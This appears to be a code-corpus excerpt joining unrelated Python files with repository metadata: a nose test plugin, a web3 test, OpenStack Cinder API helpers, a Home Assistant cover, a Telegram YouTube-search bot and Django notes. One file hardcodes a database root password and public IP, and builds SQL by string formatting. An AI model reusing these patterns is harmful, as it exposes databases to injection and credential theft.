self.datastore_admin.clear_datastore(prefix=self.sysname)
debug.write('Start nose tests now...\n')
except Exception as e:
self.container_shutdown()
raise e
def finalize(self, result):
"""Called after all report output, including output from all
plugins, has been sent to the stream. Use this to print final
test results or perform final cleanup. Return None to allow
other plugins to continue printing, or any other value to stop
them.
"""
self.container_shutdown()
self.datastore_admin.clear_datastore(prefix=self.sysname)
import subprocess
subprocess.call(['rm', '-rf', 'res/dd'])
def container_shutdown(self):
debug.write('Shut down cc process\n')
for cc in self.ccs:
pid = cc.pid
debug.write('\tClosing container with pid:%d\n' % pid)
os.kill(pid, signal.SIGKILL)
os.waitpid(pid, 0)
def beforeTest(self, test):
os.environ['BLAME'] = test.id()
def afterTest(self, test):
blame = self.datastore_admin.get_blame_objects()
# Having a hard time detecting skips. Since skipped tests don't
# clean we should not save duplicate blames...
if blame != self.last_blame:
for key in blame.keys():
self.blames[key].extend(blame[key])
self.last_blame = blame
def report(self, stream):
stream.write('Blame Report on left over objects in couchd db\n')
stream.write('='* 20 + '\n')
for key, value in self.blames.items():
if value != []:
stream.write(key + ':\n')
stream.write('-'*20 + ':\n')
last_blame = None
for item in value:
blame = item['blame_']
if blame != last_blame:
stream.write(item['blame_'] + ':\n')
stream.write('\t' + str(item) + '\n')
last_blame = blame
| 41.323529 | 113 | 0.551483 |
ace08d7c9d90f98e9cae376c4894e4736db10a50 | 759 | py | Python | tests/filtering/test_filter_against_latest_blocks.py | Arachnid/web3.py | 4a0b4adc292981958c899ae731ee60014fd94775 | [
"MIT"
] | 4 | 2018-02-04T22:06:20.000Z | 2021-04-14T22:09:43.000Z | tests/filtering/test_filter_against_latest_blocks.py | gkapkowski/web3.py | cd0cf580119e4afa41c511eb35ee31840a2fd321 | [
"MIT"
] | null | null | null | tests/filtering/test_filter_against_latest_blocks.py | gkapkowski/web3.py | cd0cf580119e4afa41c511eb35ee31840a2fd321 | [
"MIT"
] | 1 | 2018-10-04T09:13:28.000Z | 2018-10-04T09:13:28.000Z | import random
import gevent
from flaky import flaky
@flaky(max_runs=3)
def test_filter_against_latest_blocks(web3_empty, wait_for_block, skip_if_testrpc):
web3 = web3_empty
skip_if_testrpc(web3)
seen_blocks = []
txn_filter = web3.eth.filter("latest")
txn_filter.watch(seen_blocks.append)
current_block = web3.eth.blockNumber
wait_for_block(web3, current_block + 3)
with gevent.Timeout(5):
while len(seen_blocks) < 2:
gevent.sleep(random.random())
txn_filter.stop_watching(3)
expected_block_hashes = [
web3.eth.getBlock(n)['hash'] for n in range(current_block + 1, current_block + 3)
]
assert len(seen_blocks) >= 2
assert set(expected_block_hashes).issubset(seen_blocks)
| 24.483871 | 89 | 0.706192 |
ace08ec36d526177c3769cc9e355cfecd8324e55 | 13,266 | py | Python | api/common.py | hybrid-storage-dev/cinder-fs-111t-hybrid-cherry | 86eb7e8b71c26bc39164fa18a9faa1065e4c1fc1 | [
"Apache-2.0"
] | null | null | null | api/common.py | hybrid-storage-dev/cinder-fs-111t-hybrid-cherry | 86eb7e8b71c26bc39164fa18a9faa1065e4c1fc1 | [
"Apache-2.0"
] | null | null | null | api/common.py | hybrid-storage-dev/cinder-fs-111t-hybrid-cherry | 86eb7e8b71c26bc39164fa18a9faa1065e4c1fc1 | [
"Apache-2.0"
] | null | null | null | # Copyright 2010 OpenStack Foundation
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import os
import re
from oslo.config import cfg
import six.moves.urllib.parse as urlparse
import webob
from cinder.api.openstack import wsgi
from cinder.api import xmlutil
from cinder.i18n import _
from cinder.openstack.common import log as logging
from cinder import utils
api_common_opts = [
cfg.IntOpt('osapi_max_limit',
default=1000,
help='The maximum number of items that a collection '
'resource returns in a single response'),
cfg.StrOpt('osapi_volume_base_URL',
default=None,
help='Base URL that will be presented to users in links '
'to the OpenStack Volume API',
deprecated_name='osapi_compute_link_prefix'),
]
CONF = cfg.CONF
CONF.register_opts(api_common_opts)
LOG = logging.getLogger(__name__)
XML_NS_V1 = 'http://docs.openstack.org/api/openstack-block-storage/1.0/content'
XML_NS_V2 = 'http://docs.openstack.org/api/openstack-block-storage/2.0/content'
# Regex that matches alphanumeric characters, periods, hyphens,
# colons and underscores:
# ^ assert position at start of the string
# [\w\.\-\:\_] match expression
# $ assert position at end of the string
VALID_KEY_NAME_REGEX = re.compile(r"^[\w\.\-\:\_]+$", re.UNICODE)
def validate_key_names(key_names_list):
"""Validate each item of the list to match key name regex."""
for key_name in key_names_list:
if not VALID_KEY_NAME_REGEX.match(key_name):
return False
return True
def get_pagination_params(request):
"""Return marker, limit tuple from request.
:param request: `wsgi.Request` possibly containing 'marker' and 'limit'
GET variables. 'marker' is the id of the last element
the client has seen, and 'limit' is the maximum number
of items to return. If 'limit' is not specified, 0, or
> max_limit, we default to max_limit. Negative values
for either marker or limit will cause
exc.HTTPBadRequest() exceptions to be raised.
"""
params = {}
if 'limit' in request.GET:
params['limit'] = _get_limit_param(request)
if 'marker' in request.GET:
params['marker'] = _get_marker_param(request)
return params
def _get_limit_param(request):
"""Extract integer limit from request or fail."""
try:
limit = int(request.GET['limit'])
except ValueError:
msg = _('limit param must be an integer')
raise webob.exc.HTTPBadRequest(explanation=msg)
if limit < 0:
msg = _('limit param must be positive')
raise webob.exc.HTTPBadRequest(explanation=msg)
return limit
def _get_marker_param(request):
"""Extract marker id from request or fail."""
return request.GET['marker']
def limited(items, request, max_limit=CONF.osapi_max_limit):
"""Return a slice of items according to requested offset and limit.
:param items: A sliceable entity
:param request: ``wsgi.Request`` possibly containing 'offset' and 'limit'
GET variables. 'offset' is where to start in the list,
and 'limit' is the maximum number of items to return. If
'limit' is not specified, 0, or > max_limit, we default
to max_limit. Negative values for either offset or limit
will cause exc.HTTPBadRequest() exceptions to be raised.
:kwarg max_limit: The maximum number of items to return from 'items'
"""
try:
offset = int(request.GET.get('offset', 0))
except ValueError:
msg = _('offset param must be an integer')
raise webob.exc.HTTPBadRequest(explanation=msg)
try:
limit = int(request.GET.get('limit', max_limit))
except ValueError:
msg = _('limit param must be an integer')
raise webob.exc.HTTPBadRequest(explanation=msg)
if limit < 0:
msg = _('limit param must be positive')
raise webob.exc.HTTPBadRequest(explanation=msg)
if offset < 0:
msg = _('offset param must be positive')
raise webob.exc.HTTPBadRequest(explanation=msg)
limit = min(max_limit, limit or max_limit)
range_end = offset + limit
return items[offset:range_end]
def limited_by_marker(items, request, max_limit=CONF.osapi_max_limit):
"""Return a slice of items according to the requested marker and limit."""
params = get_pagination_params(request)
limit = params.get('limit', max_limit)
marker = params.get('marker')
limit = min(max_limit, limit)
start_index = 0
if marker:
start_index = -1
for i, item in enumerate(items):
if 'flavorid' in item:
if item['flavorid'] == marker:
start_index = i + 1
break
elif item['id'] == marker or item.get('uuid') == marker:
start_index = i + 1
break
if start_index < 0:
msg = _('marker [%s] not found') % marker
raise webob.exc.HTTPBadRequest(explanation=msg)
range_end = start_index + limit
return items[start_index:range_end]
def remove_version_from_href(href):
"""Removes the first api version from the href.
Given: 'http://www.cinder.com/v1.1/123'
Returns: 'http://www.cinder.com/123'
Given: 'http://www.cinder.com/v1.1'
Returns: 'http://www.cinder.com'
"""
parsed_url = urlparse.urlsplit(href)
url_parts = parsed_url.path.split('/', 2)
# NOTE: this should match vX.X or vX
expression = re.compile(r'^v([0-9]+|[0-9]+\.[0-9]+)(/.*|$)')
if expression.match(url_parts[1]):
del url_parts[1]
new_path = '/'.join(url_parts)
if new_path == parsed_url.path:
msg = 'href %s does not contain version' % href
LOG.debug(msg)
raise ValueError(msg)
parsed_url = list(parsed_url)
parsed_url[2] = new_path
return urlparse.urlunsplit(parsed_url)
def dict_to_query_str(params):
# TODO(throughnothing): we should just use urllib.urlencode instead of this
# But currently we don't work with urlencoded url's
param_str = ""
for key, val in params.iteritems():
param_str = param_str + '='.join([str(key), str(val)]) + '&'
return param_str.rstrip('&')
class ViewBuilder(object):
"""Model API responses as dictionaries."""
_collection_name = None
def _get_links(self, request, identifier):
return [{"rel": "self",
"href": self._get_href_link(request, identifier), },
{"rel": "bookmark",
"href": self._get_bookmark_link(request, identifier), }]
def _get_next_link(self, request, identifier, collection_name):
"""Return href string with proper limit and marker params."""
params = request.params.copy()
params["marker"] = identifier
prefix = self._update_link_prefix(request.application_url,
CONF.osapi_volume_base_URL)
url = os.path.join(prefix,
request.environ["cinder.context"].project_id,
collection_name)
return "%s?%s" % (url, dict_to_query_str(params))
def _get_href_link(self, request, identifier):
"""Return an href string pointing to this object."""
prefix = self._update_link_prefix(request.application_url,
CONF.osapi_volume_base_URL)
return os.path.join(prefix,
request.environ["cinder.context"].project_id,
self._collection_name,
str(identifier))
def _get_bookmark_link(self, request, identifier):
"""Create a URL that refers to a specific resource."""
base_url = remove_version_from_href(request.application_url)
base_url = self._update_link_prefix(base_url,
CONF.osapi_volume_base_URL)
return os.path.join(base_url,
request.environ["cinder.context"].project_id,
self._collection_name,
str(identifier))
def _get_collection_links(self, request, items, collection_name,
id_key="uuid"):
"""Retrieve 'next' link, if applicable.
The next link is included if:
1) 'limit' param is specified and equals the number of volumes.
2) 'limit' param is specified but it exceeds CONF.osapi_max_limit,
in this case the number of volumes is CONF.osapi_max_limit.
3) 'limit' param is NOT specified but the number of volumes is
CONF.osapi_max_limit.
:param request: API request
:param items: List of collection items
:param collection_name: Name of collection, used to generate the
next link for a pagination query
:param id_key: Attribute key used to retrieve the unique ID, used
to generate the next link marker for a pagination query
:returns links
"""
links = []
max_items = min(
int(request.params.get("limit", CONF.osapi_max_limit)),
CONF.osapi_max_limit)
if max_items and max_items == len(items):
last_item = items[-1]
if id_key in last_item:
last_item_id = last_item[id_key]
else:
last_item_id = last_item["id"]
links.append({
"rel": "next",
"href": self._get_next_link(request, last_item_id,
collection_name),
})
return links
def _update_link_prefix(self, orig_url, prefix):
if not prefix:
return orig_url
url_parts = list(urlparse.urlsplit(orig_url))
prefix_parts = list(urlparse.urlsplit(prefix))
url_parts[0:2] = prefix_parts[0:2]
return urlparse.urlunsplit(url_parts)
class MetadataDeserializer(wsgi.MetadataXMLDeserializer):
def deserialize(self, text):
dom = utils.safe_minidom_parse_string(text)
metadata_node = self.find_first_child_named(dom, "metadata")
metadata = self.extract_metadata(metadata_node)
return {'body': {'metadata': metadata}}
class MetaItemDeserializer(wsgi.MetadataXMLDeserializer):
def deserialize(self, text):
dom = utils.safe_minidom_parse_string(text)
metadata_item = self.extract_metadata(dom)
return {'body': {'meta': metadata_item}}
class MetadataXMLDeserializer(wsgi.XMLDeserializer):
def extract_metadata(self, metadata_node):
"""Marshal the metadata attribute of a parsed request."""
if metadata_node is None:
return {}
metadata = {}
for meta_node in self.find_children_named(metadata_node, "meta"):
key = meta_node.getAttribute("key")
metadata[key] = self.extract_text(meta_node)
return metadata
def _extract_metadata_container(self, datastring):
dom = utils.safe_minidom_parse_string(datastring)
metadata_node = self.find_first_child_named(dom, "metadata")
metadata = self.extract_metadata(metadata_node)
return {'body': {'metadata': metadata}}
def create(self, datastring):
return self._extract_metadata_container(datastring)
def update_all(self, datastring):
return self._extract_metadata_container(datastring)
def update(self, datastring):
dom = utils.safe_minidom_parse_string(datastring)
metadata_item = self.extract_metadata(dom)
return {'body': {'meta': metadata_item}}
metadata_nsmap = {None: xmlutil.XMLNS_V11}
class MetaItemTemplate(xmlutil.TemplateBuilder):
def construct(self):
sel = xmlutil.Selector('meta', xmlutil.get_items, 0)
root = xmlutil.TemplateElement('meta', selector=sel)
root.set('key', 0)
root.text = 1
return xmlutil.MasterTemplate(root, 1, nsmap=metadata_nsmap)
class MetadataTemplateElement(xmlutil.TemplateElement):
def will_render(self, datum):
return True
class MetadataTemplate(xmlutil.TemplateBuilder):
def construct(self):
root = MetadataTemplateElement('metadata', selector='metadata')
elem = xmlutil.SubTemplateElement(root, 'meta',
selector=xmlutil.get_items)
elem.set('key', 0)
elem.text = 1
return xmlutil.MasterTemplate(root, 1, nsmap=metadata_nsmap)
| 36.245902 | 79 | 0.631992 |
ace08f42797c7838791f00880f0bf0eca4f36c92 | 1,318 | py | Python | web/models/base.py | 18645956947/TripleIE | 326e0844ed2cd167a084658bd89703ed94a6e484 | [
"MIT"
] | null | null | null | web/models/base.py | 18645956947/TripleIE | 326e0844ed2cd167a084658bd89703ed94a6e484 | [
"MIT"
] | 1 | 2019-04-02T06:51:07.000Z | 2019-04-02T11:14:38.000Z | web/models/base.py | 18645956947/TripleIE | 326e0844ed2cd167a084658bd89703ed94a6e484 | [
"MIT"
] | 1 | 2019-04-02T02:11:08.000Z | 2019-04-02T02:11:08.000Z | import json
import pymysql
class Base():
def __init__(self):
pass
def exec_sql(self, sql):
result = ''
# 打开数据库连接
db = pymysql.connect(host='47.96.109.137',
port=3306,
user='root',
passwd='12345678',
db='kbqa',
charset='utf8')
# 使用 cursor() 方法创建一个游标对象 cursor
cursor = db.cursor()
# 使用 execute() 方法执行 SQL 查询
cursor.execute(sql)
rs = cursor.fetchall()
if rs:
desc = cursor.description
result = [dict(zip([col[0] for col in desc], row)) for row in rs]
db.commit()
# 关闭数据库连接
db.close()
return result
if __name__ == '__main__':
sqlModel = Base()
question = '2018年上海的城镇人口'
norm_questions = json.dumps({'normalize_question': []})
triples = json.dumps({'triples': []})
insert_sql = ("INSERT INTO kb_questions (question,normalize_question,triples,create_time) "
"VALUES ('%s','%s','%s',NOW())" %
(question, norm_questions, triples))
sqlModel.exec_sql(insert_sql)
# rs = sqlModel.exec_sql("SELECT * FROM kb_questions WHERE id = 5")
# print(rs[0]['triples'])
| 25.843137 | 95 | 0.506829 |
ace08f53e3cea356dbf977c47f51b8c30b76e6ca | 2,282 | py | Python | homeassistant/components/cover/homematic.py | kavyamahesh/home_assistant | fc06a6674691a99379e5928369b7973054498ee7 | [
"Apache-2.0"
] | 1 | 2020-08-14T15:01:33.000Z | 2020-08-14T15:01:33.000Z | homeassistant/components/cover/homematic.py | kavyamahesh/home_assistant | fc06a6674691a99379e5928369b7973054498ee7 | [
"Apache-2.0"
] | null | null | null | homeassistant/components/cover/homematic.py | kavyamahesh/home_assistant | fc06a6674691a99379e5928369b7973054498ee7 | [
"Apache-2.0"
] | 1 | 2020-08-26T20:54:14.000Z | 2020-08-26T20:54:14.000Z | """
The homematic cover platform.
For more details about this platform, please refer to the documentation at
https://home-assistant.io/components/cover.homematic/
"""
import logging
from homeassistant.const import STATE_UNKNOWN
from homeassistant.components.cover import CoverDevice, ATTR_POSITION
from homeassistant.components.homematic import HMDevice, ATTR_DISCOVER_DEVICES
_LOGGER = logging.getLogger(__name__)
DEPENDENCIES = ['homematic']
def setup_platform(hass, config, add_devices, discovery_info=None):
"""Set up the platform."""
if discovery_info is None:
return
devices = []
for config in discovery_info[ATTR_DISCOVER_DEVICES]:
new_device = HMCover(hass, config)
new_device.link_homematic()
devices.append(new_device)
add_devices(devices)
class HMCover(HMDevice, CoverDevice):
"""Representation a Homematic Cover."""
@property
def current_cover_position(self):
"""
Return current position of cover.
None is unknown, 0 is closed, 100 is fully open.
"""
return int(self._hm_get_state() * 100)
def set_cover_position(self, **kwargs):
"""Move the cover to a specific position."""
if ATTR_POSITION in kwargs:
position = float(kwargs[ATTR_POSITION])
position = min(100, max(0, position))
level = position / 100.0
self._hmdevice.set_level(level, self._channel)
@property
def is_closed(self):
"""Return if the cover is closed."""
if self.current_cover_position is not None:
if self.current_cover_position > 0:
return False
else:
return True
def open_cover(self, **kwargs):
"""Open the cover."""
self._hmdevice.move_up(self._channel)
def close_cover(self, **kwargs):
"""Close the cover."""
self._hmdevice.move_down(self._channel)
def stop_cover(self, **kwargs):
"""Stop the device if in motion."""
self._hmdevice.stop(self._channel)
def _init_data_struct(self):
"""Generate a data dict (self._data) from hm metadata."""
# Add state to data dict
self._state = "LEVEL"
self._data.update({self._state: STATE_UNKNOWN})
| 29.636364 | 78 | 0.653374 |
ace08f61bc076f5ea4774b0380661f6a5449ff7d | 193 | py | Python | wsgi/iportalen_django/iportalen/storage.py | I-sektionen/i-portalen | 1713e5814d40c0da1bf3278d60a561e7d3df3550 | [
"MIT"
] | 4 | 2016-09-21T17:06:01.000Z | 2018-02-06T16:36:44.000Z | wsgi/iportalen_django/iportalen/storage.py | I-sektionen/i-portalen | 1713e5814d40c0da1bf3278d60a561e7d3df3550 | [
"MIT"
] | 149 | 2016-03-07T23:50:47.000Z | 2022-03-11T23:16:33.000Z | wsgi/iportalen_django/iportalen/storage.py | I-sektionen/i-portalen | 1713e5814d40c0da1bf3278d60a561e7d3df3550 | [
"MIT"
] | 1 | 2016-03-07T23:02:06.000Z | 2016-03-07T23:02:06.000Z | from storages.backends.s3boto import S3BotoStorage
class StaticRootS3BotoStorage(S3BotoStorage):
location = 'static'
class MediaRootS3BotoStorage(S3BotoStorage):
location = 'client'
| 21.444444 | 50 | 0.797927 |
ace08fd34aaf9a4a05dc7a45354f52e19aef1108 | 648 | py | Python | actions/scripts/common_mydemo.py | gkzz/mydemo_pack | 1accb8a270a6c08ac598da81522648e4cfb1abc1 | [
"MIT"
] | null | null | null | actions/scripts/common_mydemo.py | gkzz/mydemo_pack | 1accb8a270a6c08ac598da81522648e4cfb1abc1 | [
"MIT"
] | null | null | null | actions/scripts/common_mydemo.py | gkzz/mydemo_pack | 1accb8a270a6c08ac598da81522648e4cfb1abc1 | [
"MIT"
] | null | null | null | #! /usr/bin/env python
# -*- coding: utf-8 -*-
import sys
import traceback
from subprocess import Popen, PIPE
class Common:
""" Common for mydemo """
def __init__(self):
pass
def execute_command(self, command):
bool = False
try:
stdout, stderr = Popen(
command, shell=True, stdout=PIPE, stderr=PIPE
).communicate()
stdout = stdout.splitlines()
stderr = stderr.splitlines()
bool = True
except:
stdout = None
stderr = traceback.format_exc()
return bool, stdout, stderr | 23.142857 | 61 | 0.529321 |
ace09069f8b7d6584004284e12f3de550eb27104 | 7,611 | py | Python | sockets/words.py | JesperKauppinen/paint-webapp | 772ac2b071c3cb1a984673c2f55f1de8d7692d2f | [
"MIT"
] | null | null | null | sockets/words.py | JesperKauppinen/paint-webapp | 772ac2b071c3cb1a984673c2f55f1de8d7692d2f | [
"MIT"
] | 4 | 2021-11-27T04:02:58.000Z | 2021-12-02T16:43:07.000Z | sockets/words.py | JesperKauppinen/paint-webapp | 772ac2b071c3cb1a984673c2f55f1de8d7692d2f | [
"MIT"
] | null | null | null | from random import choice
nouns = [
'people',
'history',
'way',
'art',
'world',
'information',
'map',
'two',
'family',
'government',
'health',
'system',
'computer',
'meat',
'year',
'thanks',
'music',
'person',
'reading',
'method',
'data',
'food',
'understanding',
'theory',
'law',
'bird',
'literature',
'problem',
'software',
'control',
'knowledge',
'power',
'ability',
'economics',
'love',
'internet',
'television',
'science',
'library',
'nature',
'fact',
'product',
'idea',
'temperature',
'investment',
'area',
'society',
'activity',
'story',
'industry',
'media',
'thing',
'oven',
'community',
'definition',
'safety',
'quality',
'development',
'language',
'management',
'player',
'variety',
'video',
'week',
'security',
'country',
'exam',
'movie',
'organization',
'equipment',
'physics',
'analysis',
'policy',
'series',
'thought',
'basis',
'boyfriend',
'direction',
'strategy',
'technology',
'army',
'camera',
'freedom',
'paper',
'environment',
'child',
'instance',
'month',
'truth',
'marketing',
'university',
'writing',
'article',
'department',
'difference',
'goal',
'news',
'audience',
'fishing',
'growth',
'income',
'marriage',
'user',
'combination',
'failure',
'meaning',
'medicine',
'philosophy',
'teacher',
'communication',
'night',
'chemistry',
'disease',
'disk',
'energy',
'nation',
'road',
'role',
'soup',
'advertising',
'location',
'success',
'addition',
'apartment',
'education',
'math',
'moment',
'painting',
'politics',
'attention',
'decision',
'event',
'property',
'shopping',
'student',
'wood',
'competition',
'distribution',
'entertainment',
'office',
'population',
'president',
'unit',
'category',
'cigarette',
'context',
'introduction',
'opportunity',
'performance',
'driver',
'flight',
'length',
'magazine',
'newspaper',
'relationship',
'teaching',
'cell',
'dealer',
'debate',
'finding',
'lake',
'member',
'message',
'phone',
'scene',
'appearance',
'association',
'concept',
'customer',
'death',
'discussion',
'housing',
'inflation',
'insurance',
'mood',
'woman',
'advice',
'blood',
'effort',
'expression',
'importance',
'opinion',
'payment',
'reality',
'responsibility',
'situation',
'skill',
'statement',
'wealth',
'application',
'city',
'county',
'depth',
'estate',
'foundation',
'grandmother',
'heart',
'perspective',
'photo',
'recipe',
'studio',
'topic',
'collection',
'depression',
'imagination',
'passion',
'percentage',
'resource',
'setting',
'ad',
'agency',
'college',
'connection',
'criticism',
'debt',
'description',
'memory',
'patience',
'secretary',
'solution',
'administration',
'aspect',
'attitude',
'director',
'personality',
'psychology',
'recommendation',
'response',
'selection',
'storage',
'version',
'alcohol',
'argument',
'complaint',
'contract',
'emphasis',
'highway',
'loss',
'membership',
'possession',
'preparation',
'steak',
'union',
'agreement',
'cancer',
'currency',
'employment',
'engineering',
'entry',
'interaction',
'limit',
'mixture',
'preference',
'region',
'republic',
'seat',
'tradition',
'virus',
'actor',
'classroom',
'delivery',
'device',
'difficulty',
'drama',
'election',
'engine',
'football',
'guidance',
'hotel',
'match',
'owner',
'priority',
'protection',
'suggestion',
'tension',
'variation',
'anxiety',
'atmosphere',
'awareness',
'bread',
'climate',
'comparison',
'confusion',
'construction',
'elevator',
'emotion',
'employee',
'employer',
'guest',
'height',
'leadership',
'mall',
'manager',
'operation',
'recording',
'respect',
'sample',
'transportation',
'boring',
'charity',
'cousin',
'disaster',
'editor',
'efficiency',
'excitement',
'extent',
'feedback',
'guitar',
'homework',
'leader',
'mom',
'outcome',
'permission',
'presentation',
'promotion',
'reflection',
'refrigerator',
'resolution',
'revenue',
'session',
'singer',
'tennis',
'basket',
'bonus',
'cabinet',
'childhood',
'church',
'clothes',
'coffee',
'dinner',
'drawing',
'hair',
'hearing',
'initiative',
'judgment',
'lab',
'measurement',
'mode',
'mud',
'orange',
'poetry',
'police',
'possibility',
'procedure',
'queen',
'ratio',
'relation',
'restaurant',
'satisfaction',
'sector',
'signature',
'significance',
'song',
'tooth',
'town',
'vehicle',
'volume',
'wife',
'accident',
'airport',
'appointment',
'arrival',
'assumption',
'baseball',
'chapter',
'committee',
'conversation',
'database',
'enthusiasm',
'error',
'explanation',
'farmer',
'gate',
'girl',
'hall',
'historian',
'hospital',
'injury',
'instruction',
'maintenance',
'manufacturer',
'meal',
'perception',
'pie',
'poem',
'presence',
'proposal',
'reception',
'replacement',
'revolution',
'river',
'son',
'speech',
'tea',
'village',
'warning',
'winner',
'worker',
'writer',
'assistance',
'breath',
'buyer',
'chest',
'chocolate',
'conclusion',
'contribution',
'cookie',
'courage',
'dad',
'desk',
'drawer',
'establishment',
'examination',
'garbage',
'grocery',
'honey',
'impression',
'improvement',
'independence',
'insect',
'inspection',
'inspector',
'king',
'ladder',
'menu',
'penalty',
'piano',
'potato',
'profession',
'professor',
'quantity',
'reaction',
'requirement',
'salad',
'sister',
'supermarket',
'tongue',
'weakness',
'wedding',
'affair',
'ambition',
'analyst',
'apple',
'assignment',
'assistant',
'bathroom',
'bedroom',
'beer',
'birthday',
'celebration',
'championship',
'cheek',
'client',
'consequence',
'departure',
'diamond',
'dirt',
'ear',
'fortune',
'friendship',
'funeral',
'gene',
'girlfriend',
'hat',
'indication',
'intention',
'lady',
'midnight',
'negotiation',
'obligation',
'passenger',
'pizza',
'platform',
'poet',
'pollution',
'recognition',
'reputation',
'shirt',
'sir',
'speaker',
'stranger',
'surgery',
'sympathy',
'tale',
'throat',
'trainer',
'uncle',
'youth',
'time',
'work',
]
def get_variant() -> str:
return choice(nouns)
| 15.252505 | 25 | 0.480883 |
ace090c496b19c86dec7e95bc758da1e135d2664 | 1,206 | py | Python | safebrowsing/base.py | Lcforself/safebrowsing-python | d92143496abc17703a936b04a87e95fdfc302405 | [
"MIT"
] | null | null | null | safebrowsing/base.py | Lcforself/safebrowsing-python | d92143496abc17703a936b04a87e95fdfc302405 | [
"MIT"
] | null | null | null | safebrowsing/base.py | Lcforself/safebrowsing-python | d92143496abc17703a936b04a87e95fdfc302405 | [
"MIT"
] | null | null | null | from platform import node
import conf
class BaseDbObj(object):
db_engine = getattr(conf, 'DATABASE_ENGINE')
db_name = getattr(conf, 'DATABASE_NAME')
db_user = getattr(conf, 'DATABASE_USER')
db_password = getattr(conf, 'DATABASE_PASSWORD')
db_host = getattr(conf, 'DATABASE_HOST', node())
db_port = getattr(conf, 'DATABASE_PORT')
api_key = getattr(conf, 'API_KEY')
def get_version(self, badware_type):
"""To be subclassed by backends"""
return NotImplementedError
def insert_version_row(self, badware_type, version_number):
"""To be subclassed by backends"""
return NotImplementedError
def update_version_row(self, badware_type, new_version_number, version_number):
"""To be subclassed by backends"""
return NotImplementedError
def insert_rows(self, url_hash_dict):
"""To be subclassed by backends"""
return NotImplementedError
def delete_rows(self, url_hash_dict):
"""To be subclassed by backends"""
return NotImplementedError
def lookup_by_md5(self, md5_hash_list):
"""To be subclassed by backends"""
return NotImplementedError
| 33.5 | 83 | 0.678275 |
ace0920e896e1a796a260037406f21581ac8ee2d | 628 | py | Python | fdk_client/platform/models/CreateAutocompleteKeyword.py | kavish-d/fdk-client-python | a1023eb530473322cb52e095fc4ceb226c1e6037 | [
"MIT"
] | null | null | null | fdk_client/platform/models/CreateAutocompleteKeyword.py | kavish-d/fdk-client-python | a1023eb530473322cb52e095fc4ceb226c1e6037 | [
"MIT"
] | null | null | null | fdk_client/platform/models/CreateAutocompleteKeyword.py | kavish-d/fdk-client-python | a1023eb530473322cb52e095fc4ceb226c1e6037 | [
"MIT"
] | null | null | null | """Platform Models."""
from marshmallow import fields, Schema
from marshmallow.validate import OneOf
from ..enums import *
from ..models.BaseSchema import BaseSchema
from .AutocompleteResult import AutocompleteResult
class CreateAutocompleteKeyword(BaseSchema):
# Catalog swagger.json
app_id = fields.Str(required=False)
results = fields.List(fields.Nested(AutocompleteResult, required=False), required=False)
is_active = fields.Boolean(required=False)
_custom_json = fields.Dict(required=False)
words = fields.List(fields.Str(required=False), required=False)
| 18.470588 | 92 | 0.727707 |
ace09384bcff954fc54bfdc8ea3f28487391272b | 1,589 | py | Python | search.py | MuhammadaliPassDev/Searcher | 883069a0b14d0ac493aa9402914dcf528afed7c0 | [
"Apache-2.0"
] | 1 | 2022-02-07T07:02:58.000Z | 2022-02-07T07:02:58.000Z | search.py | MuhammadaliPassDev/Searcher | 883069a0b14d0ac493aa9402914dcf528afed7c0 | [
"Apache-2.0"
] | null | null | null | search.py | MuhammadaliPassDev/Searcher | 883069a0b14d0ac493aa9402914dcf528afed7c0 | [
"Apache-2.0"
] | null | null | null | from youtube_search import YoutubeSearch as YS
from config import TOKEN
from aiogram import Bot,types,Dispatcher,utils
from aiogram.utils import executor
from aiogram.types import InputTextMessageContent,InlineQueryResultArticle, ReplyKeyboardMarkup,KeyboardButton
import hashlib
async def on_startup(_):
print("Bot is online.")
def searcher(text):
res = YS(text,max_results=20).to_dict()
return res
bot = Bot(token=TOKEN)
dp = Dispatcher(bot)
@dp.message_handler(commands=["start"])
async def send_welcome(message: types.Message):
username = message.from_user.username
#b1 = KeyboardButton("@ytlook_bot ")
#main = ReplyKeyboardMarkup(resize_keyboard=True, one_time_keyboard=True).add(b1)
await bot.send_message(message.from_user.id,f"Hi {username}")#, reply_markup=main
@dp.inline_handler()
async def inline_handler(query: types.InlineQuery):
text = query.query or "video"
links = searcher(text)
articles = [types.InlineQueryResultArticle(
id = hashlib.md5(f'{link["id"]}'.encode()).hexdigest(),
title = f'{link["title"]}',
url = f'https://www.youtube.com/watch?v={link["id"]}',
thumb_url = f'{link["thumbnails"][0]}',
input_message_content=types.InputTextMessageContent(
message_text=f'via @YTlook_BOT\nhttps://www.youtube.com/watch?v={link["id"]}')
) for link in links]
await query.answer(articles,cache_time=60,is_personal=True)
if __name__ == "__main__":
executor.start_polling(dp,skip_updates=True,on_startup=on_startup) | 34.543478 | 111 | 0.702329 |
ace09452e318642433074309a13e81d3ebebef24 | 3,973 | py | Python | buyfree_mall/buyfree_mall/apps/users/tests.py | GalphaXie/E-commerce | e358089c8002739b121cf7ced7d27b093303de94 | [
"MIT"
] | null | null | null | buyfree_mall/buyfree_mall/apps/users/tests.py | GalphaXie/E-commerce | e358089c8002739b121cf7ced7d27b093303de94 | [
"MIT"
] | null | null | null | buyfree_mall/buyfree_mall/apps/users/tests.py | GalphaXie/E-commerce | e358089c8002739b121cf7ced7d27b093303de94 | [
"MIT"
] | null | null | null | from django.test import TestCase
# Create your tests here.
'''
pycharm 快捷键 ctrl shift - | ctrl shift + 快速折叠或者展开类(函数) 阅读源码有奇效
--------------------------------------------------
实现功能:
1.email & 激活状态 -> user模型自带email,但是激活状态不能用is_active,所以添加字段,数据库迁移
2.GET ; url路径: /users/<user_id>/ -> 但是标记的是token而不是id, 所以 /user/ 复数变单数
3. request: username mobile email email_active
4. response : id username mobile email email_active
难点:视图的理解:
查寻数据 -> 序列化数据 => retrieve -> RetrieveAPIView(RetrieveModelMixin, GenericAPIView)
(继承的时候,子类不存在的方法需要调用父类的,如果父类中在该方法中又调用了另外一个方法,而这个方法在父类和子类中都有,那么会优先调用子类的,从而达到重写的目的.这种只是更加复杂一点重写而已.)
序列化器:
class
访问view视图详情的时候, 为什么要重写 get_object方法? 返回当前的用户对象?
queryset (retrieve 对其进行过滤,才会只有一个结果返回) 其默认依赖实现是: /users/<pk>/ 这两者都没有实现 => 重写 get_object
